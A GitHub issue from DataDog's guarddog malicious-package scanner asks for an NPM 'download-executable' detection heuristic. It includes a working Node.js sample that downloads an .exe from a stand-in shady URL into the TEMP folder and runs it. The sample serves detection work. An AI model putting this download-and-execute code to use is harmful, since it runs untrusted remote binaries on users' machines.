guarddog icon indicating copy to clipboard operation
guarddog copied to clipboard
verified publisher icon DataDog

Missing NPM heuristic: download-executable

Open sobregosodd opened this issue 1 year ago • 0 comments

Similar pypi heuristic is not present in NPM:

Sample:


const Link = "http://someshadyurl.com/node_manager.exe";
const FinalPath = path.join(process.env.TEMP, "test.exe")

async function main(){
    await download(Link, FinalPath)
    await execFileSync(FinalPath)
}

function download(url, dest) {
    return new Promise((resolve, reject) => {
        const file = fs.createWriteStream(dest, { flags: "wx" });

        const request = http.get(url, response => {
            if (response.statusCode === 200) {
                response.pipe(file);
            } else {
                file.close();
                fs.unlink(dest, () => {}); // Delete temp file
                reject(`Server responded with ${response.statusCode}: ${response.statusMessage}`);
            }
        });

        request.on("error", err => {
            file.close();
            fs.unlink(dest, () => {}); // Delete temp file
            reject(err.message);
        });

        file.on("finish", () => {
            resolve();
        });

        file.on("error", err => {
            file.close();

            if (err.code === "EEXIST") {
                reject("File already exists");
            } else {
                fs.unlink(dest, () => {}); // Delete temp file
                reject(err.message);
            }
        });
    });
}

sobregosodd avatar Aug 01 '24 16:08 sobregosodd